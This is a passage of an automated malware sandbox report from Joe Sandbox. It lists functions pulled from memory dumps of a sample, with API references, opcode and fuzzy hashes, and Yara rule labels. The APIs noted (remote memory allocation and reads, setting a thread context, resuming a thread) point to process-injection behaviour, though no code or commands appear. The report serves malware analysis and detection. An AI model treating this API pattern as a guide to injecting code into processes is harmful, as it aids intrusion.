Instruction ID: 4d21bf3d3be2bcd4ef8e640105eabbe8cb6d97b22048e549f103b29fc9a92990
Opcode Fuzzy Hash: bad168f7529233b8d37a4e77efb00e4940415190d8e6f5357551382e1e79488d
Instruction Fuzzy Hash: C8215771D103088FDB14CFAAC4817EEBBF5EF89310F14842AD419A7241C7789945CFA1

Function 0321EAF0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0321F16E,?,?,?,?,?), ref: 0321F22F

Memory Dump Source

Source File: 00000011.00000002.1351301781.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3210000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 48fa912e76f9bc49ac16deb41bbe753cd619dc1b6f089526994ae0545631c349
Instruction ID: 87379fd981053adff3160a09a03a91180c9d913dca94ac13a5132e7e23e94b0c
Opcode Fuzzy Hash: 48fa912e76f9bc49ac16deb41bbe753cd619dc1b6f089526994ae0545631c349
Instruction Fuzzy Hash: 8621D4B5900349AFDB10CF9AD984AEEFBF4EB48310F14801AE954A7210D374A950CFA4

Function 09F989B0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F98A30

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ba59eb603394d6ae408d3041aed80a53d5ac2f5709180e3cff4e019b94d45fc1
Instruction ID: e75f0f8af808846cc4948779084caa4e46c1e76229a11a4270906371483e173a
Opcode Fuzzy Hash: ba59eb603394d6ae408d3041aed80a53d5ac2f5709180e3cff4e019b94d45fc1
Instruction Fuzzy Hash: 98211671C003499FDB10DFAAC880BEEBBF5FF48320F50842AE959A7240D7799941CBA0

Function 09F98728 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNELBASE(?,00000000), ref: 09F987A6

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e084c12311510db65754fad3557f74fabc4944b4592bbe38b5986ec0917d8ce7
Instruction ID: df5bbe7cfd87d88f507e1ca53d4655c50f0cee92391f100894fca49c468ec8bf
Opcode Fuzzy Hash: e084c12311510db65754fad3557f74fabc4944b4592bbe38b5986ec0917d8ce7
Instruction Fuzzy Hash: 05214771D003098FDB14DFAAC4857EEBBF5EF89320F54842AD859A7240DB78A945CFA1

Function 09F987F8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09F9886E

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 647f4c7a370a693b5d4a788332c2bdd0c1baf129e32ae2b593b4ffb4cd2b21a6
Instruction ID: 6ca5735c56117b1076c46f610dfde9859d836e4c49e6d92a90a491e9b6f14d2e
Opcode Fuzzy Hash: 647f4c7a370a693b5d4a788332c2bdd0c1baf129e32ae2b593b4ffb4cd2b21a6
Instruction Fuzzy Hash: EF114A72D003089FDB24CFAAD8447EEBBF5AF88320F248519E529A7250C7759950CFA0

Function 09F98800 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09F9886E

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2213cf4b565bdfd13dea26a9ff466e0e908b633a5e0e0f77b3ca43d5e17471af
Instruction ID: c427c62362527aa329a53d637a46891cfde1bf22d3a4dd2f080beab4c04079e1
Opcode Fuzzy Hash: 2213cf4b565bdfd13dea26a9ff466e0e908b633a5e0e0f77b3ca43d5e17471af
Instruction Fuzzy Hash: E4112672D003499FDB24DFAAC844BDEBBF5EF48320F248419E519A7250C775A950CBA0

Function 09F98670 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09F986DA

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ceee086f12475ff7cdbf882b1360ce53eac57ca53b690c05cc9107489b305b18
Instruction ID: e0699d17cef2dc76e7676cd8786ffca88d922708222149295a03491f80212950
Opcode Fuzzy Hash: ceee086f12475ff7cdbf882b1360ce53eac57ca53b690c05cc9107489b305b18
Instruction Fuzzy Hash: 1E1188B1C003088FDB24CFAAC4447EEFBF4AF89324F20842AC419AB250C7756841CF94

Function 09F98678 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09F986DA

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5e82b640584e5effb793608798903bef2ef494d0997a7ae2591e0d82795fd32b
Instruction ID: afc6d1d71295e350fe637a1aea33dc2884d6e704ea88d35d481bf82a95464e4e
Opcode Fuzzy Hash: 5e82b640584e5effb793608798903bef2ef494d0997a7ae2591e0d82795fd32b
Instruction Fuzzy Hash: 2E113AB1D003498FDB24DFAAC4457DEFBF5EF89224F248429D419A7240CB75A945CBA4

Function 09F9C4B1 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09F9C515

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9f71c00a02fd0b1690a143cb18582fbe40b433e0c1c11b08c8832527f7af1646
Instruction ID: 197fed73f268e6df9b4309c15ee145f557c28cdfb38a70adc80c7e8b8e18de83
Opcode Fuzzy Hash: 9f71c00a02fd0b1690a143cb18582fbe40b433e0c1c11b08c8832527f7af1646
Instruction Fuzzy Hash: A611F5B58003499FDB20CF99D485BDEBBF8EB48310F20841AE459A7650D375A584CFA1

Function 09F9A724 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09F9C515

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 41cc45f06deb2d48e11585fb053451fac363f308a9fc99152acf9927c5130e06
Instruction ID: f474bea2c73f82bdc68a50c68c8597486e589b21b66339387260a76e3850fc75
Opcode Fuzzy Hash: 41cc45f06deb2d48e11585fb053451fac363f308a9fc99152acf9927c5130e06
Instruction Fuzzy Hash: 0511F5B58003499FDB20DF9AD445BDEBBF8EB48310F20841AE959A7200D375A944CFA1

Function 0321CEB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0321CF1E

Memory Dump Source

Source File: 00000011.00000002.1351301781.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3210000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b559bb14cf89f935dd905fe34d9a112f92052cf7367c44b5290adca0ef677318
Instruction ID: 085f1c2b0e8583fe5530dad2a4c64fb8a55e130177effee06ae46111d232c8cd
Opcode Fuzzy Hash: b559bb14cf89f935dd905fe34d9a112f92052cf7367c44b5290adca0ef677318
Instruction Fuzzy Hash: 2B1113B6C003498FCB10CF9AD544BDEFBF5EB48214F14842AD419A7204C375A545CFA1

Function 056C72EC Relevance: 1.5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

(q, xrefs: 056C7F32

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: c887b7fab8d73cefea1d13ab4f576bb0428e960a5bc4bd21c4abfaf9e599210e
Instruction ID: edadc4506670abc9a4889c573a56accec38a63a25c38957f5320a801b660ed1a
Opcode Fuzzy Hash: c887b7fab8d73cefea1d13ab4f576bb0428e960a5bc4bd21c4abfaf9e599210e
Instruction Fuzzy Hash: 34919C71A05208DFDB28DFA9E4446AEBBF6FF88311F1084AEE455A7750DB349842CF91

Function 0766BE94 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

Teq, xrefs: 0766EB71

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 6680a1ff8210ccdf20fff01096794a7bf0d89d06e136f190bca8701efcace17d
Instruction ID: f278bc69c3a4a83da29f49b6a7223230b6d3826b6bbba30c4743f82c35598a9b
Opcode Fuzzy Hash: 6680a1ff8210ccdf20fff01096794a7bf0d89d06e136f190bca8701efcace17d
Instruction Fuzzy Hash: F6519275B102058FDB14EB79D858A6EBBF6FFC42107548A29E45AD7390EB30DC058751

Function 0766C8A0 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

r, xrefs: 0766CA4A

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: b90a99849341b741f8a08aaa6d372b8a6ff6897bd7456de50658712a78fa82af
Instruction ID: a3b0148cecc8406fe997be884813e069e245c7853f57aaf7a5da48b161e4fcf8
Opcode Fuzzy Hash: b90a99849341b741f8a08aaa6d372b8a6ff6897bd7456de50658712a78fa82af
Instruction Fuzzy Hash: 60611AB4910605DFC704DF98C5888AEFBB6FF88301B64C699E84697205DB30EE85CFA0

Function 056C5E08 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

hpF, xrefs: 056C6F32

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: hpF
API String ID: 0-151379673
Opcode ID: 16e494a9b1426146f930f936318cae35dc057e2abd32b6c6b3dac5c97c235680
Instruction ID: 00653383f55414a901e5ccbb9d81c129a1c41b8231d7be6c839aef1db495f1c0
Opcode Fuzzy Hash: 16e494a9b1426146f930f936318cae35dc057e2abd32b6c6b3dac5c97c235680
Instruction Fuzzy Hash: 4141F2B1D043198BDB14CFA9C584ADEFFB5FF49304F64806AD408AB214D7B56A86CF90

Function 056C5E14 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

hpF, xrefs: 056C6F32

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: hpF
API String ID: 0-151379673
Opcode ID: e8b7e46dac5a489c36150f690aee09792e4a56224dc465d6ae8ac0891a13a26d
Instruction ID: 0b50b132d6396021fb4d1bc059ea5dd9672a4ab395198c09244da9af1e4f80e7
Opcode Fuzzy Hash: e8b7e46dac5a489c36150f690aee09792e4a56224dc465d6ae8ac0891a13a26d
Instruction Fuzzy Hash: 7F41D2B1D043198BDB24DFA9C584ADEFBB5FF49304F648069D408AB204D7B56A86CF90

Function 056C6E8C Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

hpF, xrefs: 056C6F32

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: hpF
API String ID: 0-151379673
Opcode ID: 6029233494ca5cc55029a1b3d333a34f99c851027eb33d074980dfc1765b4e53
Instruction ID: 0303c48aa4ec2e4d990227e2af9243260d14ec0ea59b8e1e52b8bbf98b4f4881
Opcode Fuzzy Hash: 6029233494ca5cc55029a1b3d333a34f99c851027eb33d074980dfc1765b4e53
Instruction Fuzzy Hash: EF41D0B1D003199BDB24DFA9C584ADEFBB5FF48304F648029D418AB314D7B56A86CF90

Function 056C6D90 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

hpF, xrefs: 056C6DC3

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: hpF
API String ID: 0-151379673
Opcode ID: f83b46831ffbf6c5e21b58f4c9e0f4a8ed05829718252561ba6e144807833022
Instruction ID: a292ed572c12e469f6c765d5d1eada7da0850ae18de2e88ec4fc9b0d0481fd2f
Opcode Fuzzy Hash: f83b46831ffbf6c5e21b58f4c9e0f4a8ed05829718252561ba6e144807833022
Instruction Fuzzy Hash: 6621B1316042048FDB10EF78C4549AABBF6EF85210B14C5ADE55ADB350EF71E805CB91

Function 0766C89B Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

r, xrefs: 0766CA4A

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 2c6f1eb2b23a5b2a91ab555cc2022a88db340ccf3bac631af309674d8892343a
Instruction ID: f0cf4d5d1a2a0982ec574b67ba848517a6019a3dafac31985bfcf1af6437e832
Opcode Fuzzy Hash: 2c6f1eb2b23a5b2a91ab555cc2022a88db340ccf3bac631af309674d8892343a
Instruction Fuzzy Hash: CA214CB4E15619CFCB08CFAAC5494AEBBB6FF89301B50C5ADE416A7320DB30A905CF50

Function 056C6D81 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

hpF, xrefs: 056C6DC3

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: hpF
API String ID: 0-151379673
Opcode ID: 89493af550d215361befcc6afe2f2f5b33e91356adc7f2ce99f9dd5d6aa1da1d
Instruction ID: 1574b8b2e965ec3314af0bf2fca628e00dbd7c2651c12ab8513b609df02320ce
Opcode Fuzzy Hash: 89493af550d215361befcc6afe2f2f5b33e91356adc7f2ce99f9dd5d6aa1da1d
Instruction Fuzzy Hash: 1511AF716002048BC710EB68C545AABBBF6EF85710B4085ADE556DB350EF74ED05CFA1

Function 0766E930 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Teq, xrefs: 0766E99B

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 9e00e2ebabb7d626d72bc072c61bd0ca7b9c28d5c4781674fac5df6141914360
Instruction ID: 372464e4089fbc56e726e9301bfa8d2c630bedb76f798132ad5e2eca865132e0
Opcode Fuzzy Hash: 9e00e2ebabb7d626d72bc072c61bd0ca7b9c28d5c4781674fac5df6141914360
Instruction Fuzzy Hash: 7D1151B5F0060A8BCB54EBB998156FEB7F6BF84311B60417AD506E7344EB329D02CB91

Function 056CBB28 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

U, xrefs: 056CBB35

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: a373a572955637ed4362037e4eb328488bd8f1ad7b368cbef5e66cc09d89a696
Instruction ID: 1792385dfb56b8786556963f2fbf018bdc7082bb5c0fc5ab80f52dee7777d623
Opcode Fuzzy Hash: a373a572955637ed4362037e4eb328488bd8f1ad7b368cbef5e66cc09d89a696
Instruction Fuzzy Hash: 73F0C8327047054FD7149F79E88495ABFAAEFC562130486BEE10ECB621CEA18C45C791

Function 056CD608 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925ca946e96a40162274cad9790c75dd1a0b5ba958b6dfa279b5aafb20223805
Instruction ID: 18051ab00fe8069486a24ebf93b68f1b753c1e787fdc86915e648e7b4bfac89b
Opcode Fuzzy Hash: 925ca946e96a40162274cad9790c75dd1a0b5ba958b6dfa279b5aafb20223805
Instruction Fuzzy Hash: 5D621031910619CFCB15EF68C8956EDBBB1FF45301F40829AD54AA7265EF30AAC9CF81

Function 056CA438 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f579065e971bb052e757be7c5fbe108203f0fb06297c1f40b8b9e31b8d40045
Instruction ID: 3ce3d2462d98c4dddc54d44b8b1c6987d67a1a806bc3e59e70de45c15701a6e4
Opcode Fuzzy Hash: 6f579065e971bb052e757be7c5fbe108203f0fb06297c1f40b8b9e31b8d40045
Instruction Fuzzy Hash: A442B831E10619CBCB25DFA8C8946EDBBB2FF49304F158699D459B7351EB30AA85CF40

Function 056CF168 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9977cb33b16e93b88159d76296ea8683674dca847f58ea5745d8adb92ed71c2f
Instruction ID: caab767b21aef35d658a61cfdccf588c24f2e2598707cd5cfc5c9d9cbe60f971
Opcode Fuzzy Hash: 9977cb33b16e93b88159d76296ea8683674dca847f58ea5745d8adb92ed71c2f
Instruction Fuzzy Hash: B2221934A10214CFDB14DF69C888BADBBB2FF89304F5486ADD44AAB361DB71AD45CB50

Function 056CD5FF Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a80904c8dd1bc81df19ca7cb4669181253035b8433c4fba870c88654815c3ce3
Instruction ID: f2f94ee0faf739ea0c9c211d77c7806292a883d9bcd0b7757ec7d0cd8e8d6532
Opcode Fuzzy Hash: a80904c8dd1bc81df19ca7cb4669181253035b8433c4fba870c88654815c3ce3
Instruction Fuzzy Hash: 7E121F319106598FCB15DF68C8956E9BBB1FF45301F4082AAD54AA7265EF30AEC9CF80

Function 056CA42B Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c41e516195a853871bf6269217b8457ee503430a0c8d8fd56242f62c977bf4
Instruction ID: 9455d0d83ca87c281baff7ce7fd2e646fd4f3fbf27be61aea2807bb01f2aaae8
Opcode Fuzzy Hash: 37c41e516195a853871bf6269217b8457ee503430a0c8d8fd56242f62c977bf4
Instruction Fuzzy Hash: 99E1D835E106198FCB24DFA8C884AEDBBB2FF49304F158699D459AB351EB30AD85CF50

Function 056CE9A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7136df08ba63f86084837b7158ba7939ed28a0ca3199ee9c3f3713edceaf93c9
Instruction ID: 4b23466e7fdd167348858758c33a945f16d696c37538c36bf583a1ab733b8d4b
Opcode Fuzzy Hash: 7136df08ba63f86084837b7158ba7939ed28a0ca3199ee9c3f3713edceaf93c9
Instruction Fuzzy Hash: 0DC1F734A10619CFCB14DF68C884AADBBB5FF89304F5586E9D449AB361EB31AD85CF40

Function 056CE990 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff1dbc70959e53ea90111cd22e89ff77f811bb47000d3ad66cff0bf18d0a8d0
Instruction ID: 6376f0de68c7a45bf6e71b4547cff63374aece1fca18e31f10a966c6d0cd6d88
Opcode Fuzzy Hash: aff1dbc70959e53ea90111cd22e89ff77f811bb47000d3ad66cff0bf18d0a8d0
Instruction Fuzzy Hash: AAA1D935A10619CFCB14DF68C884AA8FBB5FF89304F1586E9D559AB321EB31AD85CF40

Function 056CCA50 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e37c1b072d10af8f37f6076b17484ffebf3dc35f431c2c3b7fab1b853e8ca43
Instruction ID: e8e46df5a49c7985ab1793de2433c074ff43b02ea593d40e8cfd56d47e19700f
Opcode Fuzzy Hash: 4e37c1b072d10af8f37f6076b17484ffebf3dc35f431c2c3b7fab1b853e8ca43
Instruction Fuzzy Hash: 09911A7191060ADFDB01DF68C8849A9FBF5FF49310B14879AE819EB355EB70E985CB80

Function 076668A0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f54be0e5f453b4affa53ce5ff8fd5b1c72844dd744d91bd50803842574439a2
Instruction ID: a28b6fba25120488be6b60a8dcbad97517cde057f513257552892883ef438b5a
Opcode Fuzzy Hash: 9f54be0e5f453b4affa53ce5ff8fd5b1c72844dd744d91bd50803842574439a2
Instruction Fuzzy Hash: F0711AB47102468FCB15DF39D498A6E7BE6AF89600F5940A9E816CB371DB70EC41CB91

Function 056CBDD8 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb52a767210a3cb1cb557bd15251441651ad12260bb307fd400b7bb913d03da
Instruction ID: 5bb190e7e3b8f96ece0e67a68a131701b167c33681a00242206f26df6961affa
Opcode Fuzzy Hash: ffb52a767210a3cb1cb557bd15251441651ad12260bb307fd400b7bb913d03da
Instruction Fuzzy Hash: 2C71BAB8700A008FC718DF29C598A59BBF2FF8960571589ADE54ACB772DB72EC41CB50

Function 056CBBF8 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7e9169348c2814a9cdd1a064244483f1f7457ec159b420e0d80055e40d1dfa7
Instruction ID: dc6d772f76f929fdcb0f92dd04942587656da7d936d8890fa74b934becaa271a
Opcode Fuzzy Hash: e7e9169348c2814a9cdd1a064244483f1f7457ec159b420e0d80055e40d1dfa7
Instruction Fuzzy Hash: 2E71A374A002068FC704CF68D5859A9FBF1FF48314B4986AAE80ADB322D734EC85CF94

Function 0766DBA9 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c36f484b3c8bf49aa3ff16390fb21c37cae581a7b35a440c4eefdd69b570f41
Instruction ID: 427fdb61d52dc9f87c22de45e209e228180497c8517d11912bb035e615fc7ed2
Opcode Fuzzy Hash: 8c36f484b3c8bf49aa3ff16390fb21c37cae581a7b35a440c4eefdd69b570f41
Instruction Fuzzy Hash: 51713A74E01209CFCB04EFE8D4889AEBBB2FF88300F109569E846A7364DB359949CF55

Function 056CF15A Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b405b2ccfe831db56bd20614b1acff79ccadcf1d5c809c1c35900376a6cd9346
Instruction ID: 70aea80e7ad7dc70658041ecd7846381a2a6e8f5973809c3f31dbee809ece554
